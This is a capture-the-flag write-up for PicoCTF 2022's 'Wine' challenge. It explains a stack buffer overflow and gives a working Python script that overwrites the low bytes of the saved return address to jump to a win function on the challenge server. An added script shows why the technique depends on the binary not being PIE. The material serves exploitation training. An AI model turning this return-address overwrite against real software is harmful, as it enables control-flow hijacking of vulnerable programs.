PicoCTF 2022: Wine

TL;DR

  • The program contains a stack-based buffer overflow.
  • Only a partial overwrite of the return address is required.
  • Overwriting the least-significant bytes is sufficient due to fixed binary layout (no PIE).
  • Redirect execution to the win function and retrieve the flag.

Video Walkthrough

PicoCTF 2022 Wine pwn video walkthrough demonstrating partial return address overwrite

Description

Challenge best paired with wine.

Solution

import socket

# 140 bytes of padding fill the buffer and everything up to the saved return address
payload = b'A' * 140
# Partial overwrite: only the three low bytes of the saved return address are
# replaced (little-endian), turning it into 0x401530, the address of the win
# function. The remaining high bytes are already correct because the binary
# is not PIE, so its layout is fixed.
payload += b'\x30\x15\x40'
print('payload = ' + str(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('saturn.picoctf.net', 62461))
print(s.recv(1024))  # prompt sent by the challenge
print(s.send(payload + b'\r\n'))
print(s.recv(1024))  # response, which contains the flag
s.close()
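As an added illustration (not code from the writeup), the following script models the partial overwrite the TL;DR describes: replacing the three low bytes of an 8-byte little-endian saved return address yields one fixed target on a non-PIE binary, while on a PIE binary the untouched high bytes come from a randomized base and the same overwrite is no longer reliable. The original return address 0x401234 and the PIE base addresses are constructed values.

```python
# Added example (not part of the original writeup): why the three-byte
# overwrite in the solution works on a non-PIE binary and why PIE breaks it.
import struct

def partial_overwrite(saved_ret: int, low_bytes: bytes) -> int:
    """Return the address produced when the lowest len(low_bytes) bytes of an
    8-byte little-endian saved return address are replaced by low_bytes."""
    frame = bytearray(struct.pack('<Q', saved_ret))
    frame[:len(low_bytes)] = low_bytes          # the overflow stops after these bytes
    return struct.unpack('<Q', bytes(frame))[0]

WIN_LOW_BYTES = b'\x30\x15\x40'      # the three bytes written by the solution

def no_pie_result() -> int:
    # Constructed: a return address into main in the fixed 0x400000 region
    # where a non-PIE x86-64 binary is loaded; 0x401234 is an assumed value.
    return partial_overwrite(0x401234, WIN_LOW_BYTES)

def pie_result(base: int) -> int:
    # Constructed: the same offset into main, relocated to a randomized PIE
    # base. The five untouched high bytes now come from the unknown base.
    return partial_overwrite(base + 0x1234, WIN_LOW_BYTES)

def pie_overwrite_is_stable(bases) -> bool:
    """True only if the partial overwrite lands on one address for every base."""
    return len({pie_result(b) for b in bases}) == 1

if __name__ == '__main__':
    print(hex(no_pie_result()))                      # 0x401530, the win function
    bases = [0x555555554000, 0x5634a1b2c000, 0x7f12e4f00000]  # constructed bases
    for b in bases:
        print(hex(b), '->', hex(pie_result(b)))
    print('stable under PIE:', pie_overwrite_is_stable(bases))  # False
```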